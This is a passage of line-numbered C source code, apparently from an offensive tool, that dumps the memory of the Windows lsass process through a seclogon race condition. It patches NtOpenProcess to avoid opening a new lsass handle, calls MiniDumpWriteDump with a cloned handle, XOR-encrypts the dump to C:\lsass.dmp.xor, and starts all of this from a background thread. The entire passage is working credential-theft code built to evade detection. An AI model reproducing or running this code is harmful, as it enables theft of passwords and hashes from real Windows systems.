need to patch NtOpenProcess because MiniDumpWriteDump() would open a new handle to lsass and we want to avoid that 478 | ReplaceNtOpenProcess((HANDLE)hLsassClone, oldCode, &oldCodeSize); 479 | 480 | BOOL result = MiniDumpWriteDumpDyn((HANDLE)hLsassClone, GetProcessId(hLsassClone), NULL, MiniDumpWithFullMemory, NULL, NULL, &callbackInfo); 481 | if (!result) { 482 | printf("MiniDumpWriteDump failed with error code %d\n", GetLastError()); 483 | exit(-1); 484 | } 485 | RestoreNtOpenProcess(oldCode, oldCodeSize); 486 | // unprotect the handle for close 487 | SetHandleInformation(hLsassClone, HANDLE_FLAG_PROTECT_FROM_CLOSE, 0); 488 | EncryptAndWriteDumpToDisk(dumpPath, xorKey); 489 | HeapFree(GetProcessHeap(), 0, gDumpBuffer); 490 | gDumpBuffer = NULL; 491 | CloseHandle(hLsassClone); 492 | break; 493 | } 494 | CloseHandle(hDupedHandle); 495 | } 496 | CloseHandle(hSeclogon); 497 | } 498 | 499 | DWORD WINAPI DumphashThread(LPVOID lpParam) { 500 | int xorKey = GenerateEvenRandomInt(20, 100); 501 | DWORD targetPid = GetPidUsingFilePath(L"C:\\Windows\\system32\\lsass.exe");; 502 | MalSeclogonDumpLsassWithSeclogonRaceCondition(targetPid, L"C:\\lsass.dmp.xor", xorKey); 503 | return 0; 504 | } 505 | int DumpHASH() { 506 | 507 | //MalSeclogonDumpLsassWithSeclogonRaceCondition(targetPid, encryptedDumpPath, xorKey); 508 | 509 | 510 | HANDLE myThread = CreateThread( 511 | NULL, // 默认线程安全性 512 | 0, // 默认堆栈大小 513 | DumphashThread, // 线程函数 514 | 0, // 传递给线程函数的参数 515 | 0, // 默认创建标志 516 | NULL); // 不存储线程ID 517 | 518 | if (myThread == NULL) { 519 | fprintf(stderr, "Failed to create thread. Error code: %lu\n", GetLastError()); 520 | return 1; 521 | } 522 | //WaitForSingleObject(myThread, INFINITE); 523 | 524 | // 关闭线程和事件句柄 525 | CloseHandle(myThread); 526 | 527 | } --------------------------------------------------------------------------------